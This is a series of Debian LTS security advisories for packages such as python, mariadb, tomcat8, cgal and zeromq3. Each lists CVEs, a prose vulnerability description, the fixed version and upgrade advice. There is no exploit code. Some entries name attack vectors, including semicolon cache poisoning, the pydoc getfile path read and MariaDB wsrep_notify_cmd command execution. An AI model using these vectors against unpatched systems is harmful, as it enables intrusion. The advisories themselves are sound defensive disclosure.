-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2660-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky May 13, 2021 https://wiki.debian.org/LTS - - Package: libgetdata Version: 0.9.4-1+deb9u1 CVE ID : CVE-2021-20204 One security issue has been discovered in libgetdata CVE-2021-20204 A heap memory corruption problem (use after free) can be triggered when processing maliciously crafted dirfile databases. This degrades the confidentiality, integrity and availability of third-party software that uses libgetdata as a library. For Debian 9 stretch, this problem has been fixed in version 0.9.4-1+deb9u1. We recommend that you upgrade your libgetdata packages. For the detailed security status of libgetdata please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libgetdata Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIyBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmCdPw0ACgkQ0+Fzg8+n /wbrsg/4yqtSRrVIx4RP7XTZUC9NFa2YkX0eXgAIf2WedW9x6kFQPDx8RoV6TEwH hj9oxRNnNbmmYHABfZ/7F9OAasz5rKUnf916HWdzIfJdbu1xS21alHYMxXrP63mC IjcKbln5dUnnNCljIdMgDkf11Sq5ylYoe+houbo/pPsephb1c5mQALRzQDQgqCxN cJUB7dU4ikPanJypDqbHsf8ToNex1RsGBMTCFUghJZxGCYFqAVbAWTUY1civtQ/x ABBQ5L9BvQzVxOteZsjzMFJM6gzMR6gnGCiWVgIzLhDmCXk/IYHuxchwr6ubOD8V M0vEi5ntkAoWmdD5QRoMOc/B+uyWcsITQjVGgFkc9UvQhgj9gf8/IM9l4a8JOIw2 wYyO27BnLwZnS34IBrYbwExRf33lBA+KrdtyN5YJ97C4DTEPnos8Xo9MPVnU8B8W X8NS/6/UrRRv4XiSW1hcybPDJMhcZeJMuVufxIDfUqqSnH/yerWFAmjzi2ZNn8rC 6aQELqx/Z1qnpRiINkoYm5TtrpG87nzcAyvN7qbJcYQRpuMKiiQZiYbIAtL1hNnF OB3xLjooi61of9ObaJ9MlEwxBJk1GcNGMlEHgMbucumstHwwisoKDzlgVbhNUYZE ZPxZpBUvpC7xIvMIcR7AIhZ3Whxqg3L0sY2niad+7ZbPC7y1eg== =pqt1 -END PGP SIGNATURE-
[SECURITY] [DLA 2649-1] cgal security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2649-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky May 04, 2021 https://wiki.debian.org/LTS - - Package: cgal Version: 4.9-1+deb9u1 CVE ID : CVE-2020-28601 CVE-2020-28636 CVE-2020-35628 CVE-2020-35636 Four security issues have been discovered in cgal. A code execution vulnerability exists in the Nef polygon-parsing functionality of CGAL. CVE-2020-28601 An oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_vertex() Face_of[] OOB read. An attacker can provide malicious input to trigger this vulnerability. CVE-2020-28636 An oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh->twin() An attacker can provide malicious input to trigger this vulnerability. CVE-2020-35628 An oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh->incident_sface. An attacker can provide malicious input to trigger this vulnerability. CVE-2020-35636 An oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->volume(). An attacker can provide malicious input to trigger this vulnerability. For Debian 9 stretch, these problems have been fixed in version 4.9-1+deb9u1. We recommend that you upgrade your cgal packages. For the detailed security status of cgal please refer to its security tracker page at: https://security-tracker.debian.org/tracker/cgal Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmCSKqkACgkQ0+Fzg8+n /wYGPRAAkavgFuBvhoyzk9jh6dyqtg3LVeLwws53CnJwM4aUWnm+WPZqMmQR4rWr lCkjkRMM2ozKYoytfRA5UjjuhJsA16f66BxLR8CmQkRYayQaCDtRi40tbvHuem+n Qq+Z2Dc9PaP+l95myBPWwJWa+RWZrYXrw3JdwHfrRQycQnFopsZx2ghc0jjnAlC9 jAoayqdM5436DV7oH705KnKGRtgWSC2bi9uquqItyTd3pAznG1CICa0ioMM6o6Qb PfZaRnHh2uPDDds+A2gFn6+j5PYK4M2Sa8/ORCYZqCvToFpVQIc+HeFkbrXfWeOr kK86Hpr2DqjEV8CnZadAHEfVqt9/FkGKYTxdbvfW5o4GkdDxJo+HQbntn9VQ4eqB awa5I/kHopCD6WA8YkMzpKkApQOqy7+BMa3s1EDXBtbgd8BffvYeNywT2GuPzluO e4m1L+nJl1p+t/a5yu/R7glPHWGidHYR+E+ow8Q90KY3HHTZfY4edWmtf87h3Xtt SG4Mp2UjloeuiIUUWGclKzqAzATh4BNiggAB9aq8sxi7/jwYa57dT1Xw/oVTEZD5 pQRei9F3F/+y70NVzFvWz9hV5LxEtC6K8RbMFVGS9pPaZfe0RLNO7MXACV6NUbZO QnI4lFHGuh9Xb0/P/mcahci3q0X4wvXxR9FB0Z+Wo2VLMTmzPl0= =bnXH -END PGP SIGNATURE-
[SECURITY] [DLA 2646-1] subversion security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2646-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky May 03, 2021 https://wiki.debian.org/LTS - - Package: subversion Version: 1.9.5-1+deb9u6 CVE ID : CVE-2020-17525 One security issue has been discovered in subversion: CVE-2020-17525: Subversion's mod_authz_svn module will crash if the server is using in-repository authz rules with the AuthzSVNReposRelativeAccessFile option and a client sends a request for a non-existing repository URL. This can lead to disruption for users of the service. For Debian 9 stretch, this problem has been fixed in version 1.9.5-1+deb9u6. We recommend that you upgrade your subversion packages. For the detailed security status of subversion please refer to its security tracker page at: https://security-tracker.debian.org/tracker/subversion Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmCQ2moACgkQ0+Fzg8+n /wYuBQ//XVEyexG/MpiecNhCxmVUaRcq5w188jKNHqv4K3XjveKzvx4FQoayhwdR MllGy4kInS/A/9JYnSIqCyRRk3UAxSvULU724N/lkXyWHskExdZxr3jDco1eByA1 3cWu3AmomjHGh6G4lla57jZxtcdnbtgkPbaCGEV8AZFMfUAgkk1l00EiEfRtsAjD Gu/ZIYXdzbBvCKBeeoNq7c9tb2NH+Yrk7albevRPl9/cSP0mD5zNLcgIEWiJDkcF S2q7z8i0nK/JkX6VKk2NJCgUTFBInkEPViKaGyweIDwGr94xW2k6veF7amaNj+ln y8b6cM+cT3kf9VtUCn5bOLCwhaG41aOJ3/1yVkBRJ1gRwdvKbtEljjViqMla2WvV JcsCN5N6UBf09BNF+C8Qp7Bzg3SaiAnUa4XIeDDFuO/WLoBUc4mRSlXrU2U5+9K5 uDn3HU4REd3CNEDVUxPAv+nFGU6qrwFJgf6kCwPdQv3mH9SvMr4C18glufcCERPO XlG9Kls9Aa39thgk0shDMstbmzwii0L9ZMVZBwJfY8iGHZA7ITuqzHMnjdFZtXwa MIpo6kOGkkPsvQN6EX9xHq5nNQwKzhm5hA8U2KfyDevvLSvb1TlJqLGniMUnoaAy jWzJ1d8u1YQ2eJWaU8BOY0ctreiGBWRwzKpIUP44RMY2JvUl/1o= =chqu -END PGP SIGNATURE-
[SECURITY] [DLA 2628-1] python2.7 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2628-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky April 17, 2021https://wiki.debian.org/LTS - - Package: python2.7 Version: 2.7.13-2+deb9u5 CVE ID : CVE-2019-16935 CVE-2021-23336 Two security issues have been discovered in python2.7: CVE-2019-16935 The documentation XML-RPC server in Python 2.7 has XSS via the server_title field. This occurs in Lib/DocXMLRPCServer.py in Python 2.x, and in Lib/xmlrpc/server.py in Python 3.x. If set_server_title is called with untrusted input, arbitrary JavaScript can be delivered to clients that visit the http URL for this server. CVE-2021-23336 The Python2.7 vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter. **Attention, API-change!** Please be sure your software is working properly if it uses `urllib.parse.parse_qs` or `urllib.parse.parse_qsl`, `cgi.parse` or `cgi.parse_multipart`. Earlier Python versions allowed using both ``;`` and ``&`` as query parameter separators in `urllib.parse.parse_qs` and `urllib.parse.parse_qsl`. Due to security concerns, and to conform with newer W3C recommendations, this has been changed to allow only a single separator key, with ``&`` as the default. This change also affects `cgi.parse` and `cgi.parse_multipart` as they use the affected functions internally. For more details, please see their respective documentation. For Debian 9 stretch, these problems have been fixed in version 2.7.13-2+deb9u5. We recommend that you upgrade your python2.7 packages. For the detailed security status of python2.7 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/python2.7 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmB7N4EACgkQ0+Fzg8+n /wb/qxAAj6FN++ub8ZbGfOH4my+nWTGASrjSPjUk4+XSA1JsKxTgXUfqEeYW1+ms N7JvsaO4tgS946tVvlxDEokjso3BH7ljJQHpNKhbqsDmIUHvK3Fm2Xrg1J750gGl dsJjkUx85Yq/+B8JyidJMrsj//AZVsd76B9J5cSw47gyowLa++fAT4Lbk1rTCajO FL80pGEA2Mmw4c/HA9qgLvNtMsQWlgQCIObK20d0mQSzvCA5X13SM5U4bhbsoAqW AM3mEWOyFs53MssKBych940sqA2YZKUkS7voL2BzjXANSTAFI2rPiQn3kPaoNtl6 7v9JMDYuhZypj2VdNOWS0NkZGUtBI9RcsLAIUdrrzLIDEQ0tvgOBWHakvS0W/K7H IZOUoBoyRSU573dhGC4WaQMgaaYmk/E+sWngy6Qu6G4FmSZOX/ANeX1NkU8JGBJ7 Ej9FUn9/4nOkYSwspznueXuFsSFEtmBQD9hZ9xV+L8xxyASlT/5dORsIYYkz2xX3 E6yJ5foLuk0xqCXH5tBlHoS/9Wy2ccoOEltYZCXFvvA6vL7izrmXWxOniOPsQ6b8 cOnQBHHXu0ervBD017MgXPfpmjXlc8STlF+oz35TYEZ6K8Q0caCYK7vKHUCVgSev YcAZoIrwEV43nWsSWjK03NnZfLfLCleoTtsyB7rwvokXEZrTErs= =OkPp -END PGP SIGNATURE-
[SECURITY] [DLA 2619-1] python3.5 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2619-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky April 05, 2021https://wiki.debian.org/LTS - - Package: python3.5 Version: 3.5.3-1+deb9u4 CVE ID : CVE-2021-3177 CVE-2021-3426 CVE-2021-23336 Three security issues have been discovered in python3.5: CVE-2021-3177 Python 3.x has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input. This occurs because sprintf is used unsafely. CVE-2021-3426 Running `pydoc -p` allows other local users to extract arbitrary files. The `/getfile?key=path` URL allows to read arbitrary file on the filesystem. The fix removes the "getfile" feature of the pydoc module which could be abused to read arbitrary files on the disk (directory traversal vulnerability). CVE-2021-23336 The Python3.5 vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter. **Attention, API-change!** Please be sure your software is working properly if it uses `urllib.parse.parse_qs` or `urllib.parse.parse_qsl`, `cgi.parse` or `cgi.parse_multipart`. Earlier Python versions allowed using both ``;`` and ``&`` as query parameter separators in `urllib.parse.parse_qs` and `urllib.parse.parse_qsl`. Due to security concerns, and to conform with newer W3C recommendations, this has been changed to allow only a single separator key, with ``&`` as the default. This change also affects `cgi.parse` and `cgi.parse_multipart` as they use the affected functions internally. For more details, please see their respective documentation. For Debian 9 stretch, these problems have been fixed in version 3.5.3-1+deb9u4. We recommend that you upgrade your python3.5 packages. For the detailed security status of python3.5 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/python3.5 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmBrNeUACgkQ0+Fzg8+n /wZnPw/9FUg2WLvwJI/Do7CQw9ncdyP/bXMlcQFNfN/O+tW3AIDdwBOSRsxSv2P8 ahXhWIge4EUOQst4tN3v48xbtReokEvwiUgRNXKFmMr1qZyD/o/3+EzZKoC5wbp0 a6nISMyHluFJI3YgTDew++5wg9QEaWDGnPOucrl7OxQy4pyX2rrmm8Ral7ODEt9L uo8dDo6NciuuyMJ3VC9EUmROvYC96cMpzflOWwccGCq5Y9ikOk92XE7kxMIPWm7M VLWYUck63gWD5g0nAfVRdzICK4DW6mDdOyjCu4EfXkD6Wm+bP53x34GPC8FKDOIl 3YIibvoWbTSpgfbgv+jOT64WPB1dMt6baxlOIrWrqF3dpuAaD365+tMqgZ4PpfAz 3LRPksgsrTVgRWW4YOfJGcEjH+gpMElmpzHRR0aUsVOvQWZW/zHoxoUf6wCkPuz5 y8QeK29ew8+8jvCYSittmt8jBg/bT/ZIeStfLqpKJ+U3GBgaaXaVeM7/Ap6WfNwL GLWbWug3k4Oc4tXAq9UHa7xDXrBuy+mbZqSt1Wdga61aYnVSNR2Q2/gSO9rDlFmQ 9mBjpmBQs9Igtq04V9OGmiYK2/21fH1o5/t2CFiW1H+Bg2l7SLSASGsw+0DLplXx mz+49X15SDJvrX7jKAaDMSS48IunVXcyzskLXGjCxbqwPRNRJCI= =GjSr -END PGP SIGNATURE-
[SECURITY] [DLA 2605-1] mariadb-10.1 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2605-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky March 22, 2021https://wiki.debian.org/LTS - - Package: mariadb-10.1 Version: 10.1.48-0+deb9u2 CVE ID : CVE-2021-27928 A remote code execution issue was discovered in MariaDB. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. For Debian 9 stretch, this problem has been fixed in version 10.1.48-0+deb9u2. We recommend that you upgrade your mariadb-10.1 packages. For the detailed security status of mariadb-10.1 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/mariadb-10.1 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmBZjKkACgkQ0+Fzg8+n /wai4g/5Af31KHUFQnd+4/73CfoxoLLHCWo59TJA76EVsQwbIHF1N+4uM1pzVXjf VSbzKSfL3PSMHGs5NcBRlT+Aofn3G3lNMEKpEVQoeCH1vPLUuqclUIssTX+biPAJ 4HkmiUhJRSnXVPcTGFmSqGOq4Wb0iDeUBOlX6Zgx6XFh5BFRrD/gZZQp7BUMJ4Xd xBoDiBsutBrPy3zovUEfNYypc5vJQZ/6WGkqxEqVpkP35Tte2z2SGRimRnw3HlDl jP2NvqauY+xf2QKwEE3h/aqwF4RC9NSSlxnBMXW+4MF2+F/7IpKaBk8WXBGdUBVc CMJXvW85QBeqguA1umkCRpL2/lUAiY3F79ywzmZVngO7UV80bSSXEx//9hGeS5pd 6oqI97bICLeJmGmS+B9jJotXDQazYfwxtYSEClPFYsWDVNmyw6TwxGs4TVIyf5cn +g3A80aHVgTIjtYN5wTmB9dmg5daVfGedy7BrosNCreAQfVWkwv5St8ep36rBw3u IoFD4Of1cnlXK8GglC1pze3n/2Fn9pm9R7JioXyJdme6L9C2vap9ocTNMpRFfA4U EIP1l2lb5vBt5S65tCTX6yosFaYjH7nMFWSmHYxv4vuBaZsubhRE5zAMsoPdrOLN 8prsh5O/RXvYb0ZsYQY1eApjTz05nGEw7wtyZqj1dWjQjpsCP9U= =omZt -END PGP SIGNATURE-
[SECURITY] [DLA 2596-1] tomcat8 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2594-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky March 15, 2021https://wiki.debian.org/LTS - - Package: tomcat8 Version: 8.5.54-0+deb9u6 CVE ID : CVE-2021-24122 CVE-2021-25122 CVE-2021-25329 Three security issues have been detected in tomcat8. CVE-2021-24122 When serving resources from a network location using the NTFS file system, Apache Tomcat versions 8.5.0 to 8.5.59 is susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances. CVE-2021-25122 When responding to new h2c connection requests, Apache Tomcat could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request. CVE-2021-25329 The fix for 2020-9484 was incomplete. When using Apache Tomcat 8.5.0 to 8.5.61 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue. For Debian 9 stretch, these problems have been fixed in version 8.5.54-0+deb9u6. We recommend that you upgrade your tomcat8 packages. For the detailed security status of tomcat8 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/tomcat8 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmBQQhsACgkQ0+Fzg8+n /wb10hAAmvm8DDeYNtmEam4gMC6kJ3K5nHu64v8QXiF9ecZTJgHzH4vNLlVc1jUT xBiiQOpJi+5abkMomOnpmHc1ZadmtltPzk1zprds9QqkPbbAOYwl7hzM0MQVcQ2f 4GsRpuLuVxNvjRLEyhUurqXX8/uQ4IuhF19SzOqsP0DOZYuDVptUEfmv9jySO13W xLkQtDLey9GV5y95X+s++hcyxZgJTrpWL6UFnhtqYE14TgP4zngh8ivwNmZ0nabp /gYRdxcKfu5j7J1+bc7hSGzYJtkUu3mjyGjaE6UcYH87cM7dUSofwwVeYFhap7Kf 8FWJwpAVmB9NTbaQIJ37Dd2ThG1a9MTwUtUy1WmZ9kTMbpJBGzfU+dWx90cm2Vg/ kvZWSX2VnKfxpZgJqxpCdvLD6IRz97Sy1rLie9Tx9GePUEegaG4S8CWTzckV289F /ruBAPuvI2t/QT4DunX2+POzE3QzZ1kKYBZyT1F5nHHu2Gck/v4Tjp/wPzBkQl8m izP2Ctj9eITKszjydYcTdEc+7jKpjjIW8xxYAKuhaKurzvCXJGqKyOxZ1nU1+AqN 38genI5bhGk6HojKvGWrjW/O2jFjaEysWr801jo/BsLvoxJfFFNcItmLxKhwBZyP +hOP6j9Rv/wrRYjjNaO+2sHeTYDe+b8YQL5uKe407rS3y4i+Pxk= =E9kd -END PGP SIGNATURE-
[SECURITY] [DLA 2588-1] zeromq3 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2588-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky March 09, 2021https://wiki.debian.org/LTS - - Package: zeromq3 Version: 4.2.1-4+deb9u4 CVE ID : CVE-2021-20234 CVE-2021-20235 Two security issues have been detected in zeromq3. CVE-2021-20234 Memory leak in client induced by malicious server(s) without CURVE/ZAP. From issue description [1]. When a pipe processes a delimiter and is already not in active state but still has an unfinished message, the message is leaked. CVE-2021-20235 Heap overflow when receiving malformed ZMTP v1 packets. From issue description [2]. The static allocator was implemented to shrink its recorded size similarly to the shared allocator. But it does not need to, and it should not, because unlike the shared one the static allocator always uses a static buffer, with a size defined by the ZMQ_IN_BATCH_SIZE socket option (default 8192), so changing the size opens the library to heap overflows. The static allocator is used only with ZMTP v1 peers. [1] https://github.com/zeromq/libzmq/security/advisories/GHSA-wfr2-29gj-5w87 [2] https://github.com/zeromq/libzmq/security/advisories/GHSA-fc3w-qxf5-7hp6 For Debian 9 stretch, these problems have been fixed in version 4.2.1-4+deb9u4. We recommend that you upgrade your zeromq3 packages. For the detailed security status of zeromq3 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/zeromq3 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmBI7kcACgkQ0+Fzg8+n /wZ8pw//b+XR7+mftqtDtMoLD/uRDR4S90OXtVeNJeuigpBuoeHYX1x+ukBZxTki O9/QFjtan1MsONltjpq0FB5WHC6wjjP7FJVRRa4LT85CAFHe0X+5UxohorLBRaRY XiQlbB+0H22/QM92JHUzP7imSkXaoMubnQ8P8EMkQqiEK3xMhZxcePDq6ueMf9b7 WiaPmEaZVXFcAAl1gcF094Ce53okPgRla5uifFkKRreSOk0bTzYIzZOWLRRHABt/ 9RvzKKuCsyn9qjXkjM1sXYU8NReEn2CBQI7nr4sHDeYJdG64f32HYnffUWZtpJSC cuHxuDCGJ1Z1pWPnUDiL2G8vJMfqmvkhqDvF4LZjUMx7cviuCDu8gxG5Kgh8L78Y svi6Y8xlvpnLfrKjm+3AyA5LpnNmeVt9PgBzYaa1dFRqn5SK1WUdgi3pdjR2jUs5 wXdjIZxfj2YihVnGgsF5Mc8fiOK/oSPEfnCtQUCaVqUPKkrm2ywL3hEY1c53E40n gm4Uveo8j51dIEAMa6z06DWb7r5Rq1JwToqkRXv6lPmI0Y78VCTBD2E1M+1MkinQ jcDeMGT3j1EYidQ4Ggn42rRrRdokjWgZKeoMj7CCNoM1dM0AYfcS+XJlio2Pdcnu LmswK0vMGv71FtzTgmIjRxsv9ZVzNAA1CDHKzkWRqEVs6GjLOQY= =zHQ+ -END PGP SIGNATURE-
[SECURITY] [DLA 2207-1] libntlm security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Package: libntlm Version: 1.4-3+deb8u1 CVE ID : CVE-2019-17455 It was discovered that libntlm through 1.5 relies on a fixed buffer size for tSmbNtlmAuthRequest, tSmbNtlmAuthChallenge, and tSmbNtlmAuthResponse read and write operations, as demonstrated by a stack-based buffer over-read in buildSmbNtlmAuthRequest in smbutil.c for a crafted NTLM request. For Debian 8 "Jessie", this problem has been fixed in version 1.4-3+deb8u1. We recommend that you upgrade your libntlm packages. Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAl64K/kACgkQ0+Fzg8+n /wbYhw/+IYUw88cFkAa1sK8EdXbLQvbmE/2dOD3ZaaJsrxtB2L3aTORyjcpe3FEI wgQ+mM7Tn4o3IAVVcKq3xjYyBG/k+wKRTfGnWQJI9aJivDZYpYbR06fFya95HC7+ FpBFwAwEA1AVHOif3jAjDSMKKrxRhML58zj7cIZLYybgfcooTk3jrn+e1Y+0XxnX Y+uslnvvAunRh6n67+Gbq8Nf3oqXV22039XpvUQbzApSkgWJojRvx1IlNUFT5JOL a8jdbtTc0l6DegIWmpvkrB1wFHq93g9zZBvbRUBP8VyMnsZCR6LV7GZMI04N/Cl0 CeJmVenE9i5bTBaVcNMvuXGWtjzm7mTgFiILck1qk7zxSZnJJnZeHE3qb/+iaCZn SxQpu+EXudw2V1SaqvPr8FUPA6DWRV8nnmlneYLq/5DJJJEBUMU4GTiTIrdUpyjE rzOvQ3rivd/ILvAsKmVQU5Tu8fpqMNR4tKpv/mu8ybU2oF7z8jmtv4p/B3ywYOXr owGt8CEJ4b6FwGJiMWiccd0fkGx1rtSXqUSA802ctIEnjyG88Cvhtvb7J9c5GrvU I3H3PaMYBiANnxPOZ1XSCNpMh1flqBLX60O70rX4/RkfhoNTMiXmWLB2t8lxMofw NJGcSfKTdlePFANF9DUK9y8ifby39XaoxqbIp8dequY28mMpPwc= =40TN -END PGP SIGNATURE-
[SECURITY] [DLA 2200-1] mailman security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Package: mailman Version: 1:2.1.18-2+deb8u5 CVE ID : CVE-2020-12137 A vulnerability was discovered in mailman. GNU Mailman 2.x before 2.1.30 uses the .obj extension for scrubbed application/octet-stream MIME parts. This behavior may contribute to XSS attacks against list-archive visitors, because an HTTP reply from an archive web server may lack a MIME type, and a web browser may perform MIME sniffing, conclude that the MIME type should have been text/html, and execute JavaScript code. For Debian 8 "Jessie", this problem has been fixed in version 1:2.1.18-2+deb8u5. We recommend that you upgrade your mailman packages. Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAl6uobwACgkQ0+Fzg8+n /wbMJQ//eUbb2EAZBBKxb4pvXbNm4BrGCl1FDGC2YC/j2U8F50zlYKF4f5sJoEb5 JWWwV80/rqNd3RyUS9kU8ddl0y0nArt6uH9QrhUFgTtx3woT2lPj128cj18+dxfk rSjsc++FxrU/eoUG4DDTghdPJcmT8Mqp4GoaMlaS2OZzimWFYJv6hgiDY80a5ywX 75SzakbpOX1LJgC+0J8S90d+qzmHKirrVC7udn6OivXB288IZjKvchZcE6aZTaED XTYzQYKyHXfiCZnAZPh2Us0w2Dzpkik1E6ysRSc0vBDBZ6NFh7wc0AvXOyHdSzKX FAj2pXAMABpuloBB2cqryl+9vTVOW5AFDs41SDAytG1CetOQjmka/lQyx8Cc0lYZ KBm95t2kahBrpq4+zZJPyR2k5zkW3YFKH7m6idFMLsGPpInB+++5sF0aL84vyCgE uJNatg0qIf90XiNFDM01+E07AjhpJyxNTVEWnXZ60bUCyMZpMwqRl7X4o7EdQPCm b8onRF+JlHMK6Js27hb0PQo8ofBtN6QvVcbgR1vD68x9ZpSOgdJqzAOJenKWu407 DSumuJRnDeDcisGR+P/M2FoKMuDDcBlRjpv5ob/o8AxnHG7klo4H0KCLLJvMX9iX cr0C1xc/ke/BlZ4bkga+vEZqaRFeZSQ+o5FrFuhapagAQRU5zbg= =TeBZ -END PGP SIGNATURE-
[SECURITY] [DLA 2161-1] tika security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Package: tika Version: 1.5-1+deb8u1 CVE ID : CVE-2020-1950 CVE-2020-1951 Debian Bug : 954302 954303 Two security issues have been detected in tika and fixed. CVE-2020-1950: carefully crafted or corrupt PSD file can cause excessive memory usage in Apache. CVE-2020-1951: Infinite Loop (DoS) vulnerability in Apache Tika's PSDParser. For Debian 8 "Jessie", these problems have been fixed in version 1.5-1+deb8u1. We recommend that you upgrade your tika packages. Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAl5/vcgACgkQ0+Fzg8+n /wblJQ//XmHdn2NoWi61t0m0mu2x9zi0kvkSiHbD3yUpo/pqFI5KLOQz61W2Q2OQ h50cAC9bWai+Vzz0LytjR9uL3z/yE0YETQlYDeHXpigTsso2OixnxcJwMIQSDSZC AgWITLEwL4pO8InZnmrAVhrGOcfqiOn1BNzh3yHzcZ/1ytKSL43UB/J/FQlOQDCR kQ5JHTUSdCaR9yG8pvFKpiJmauaKTDbPaEIHJ4T+Vhe3twubT1fKbWASbcgvCO5Q T41R8Qmvy8fou5IHoB2LLwqsPwrhpSBqES2tt4XLEuGlsOH2ZMn9JfkZL5yT2PQ4 818WIwTa56Mwagb96hwq1F0Q2PTWCHnF7mnZk6xz2Cq1OeoLjOBOa33xFGleYio6 Uo+W4nuXbRvTuIMxmTZKlgKWoOBefMd7PbtQtQzX8X0H9BMypGbelhw3OAhTNKtl pNTPHp8FflmKVw4JY1ef2g+9cf+xagv/aWmOQiKbtzLuroAFdp9BdGYw4/jOyGIr /J2WxnkHbbROiRyslMS36J9e01ewXJSdJyvA9mVITfPbYkRtSlylZIwafd0Ven/O 1Ax6dClbL8Mk++7M9cjJ3TbJlp5934W5Ximx6RXLEI9p1omWGotVBW3kVIjJtg3Q ybKbimsCtxCCXJ9WwQTHgzGzJrJpGTGWT/ki7Ey2jgKKVJe4aWs= =mAhY -END PGP SIGNATURE-
[SECURITY] [DLA 2148-1] amd64-microcode security update
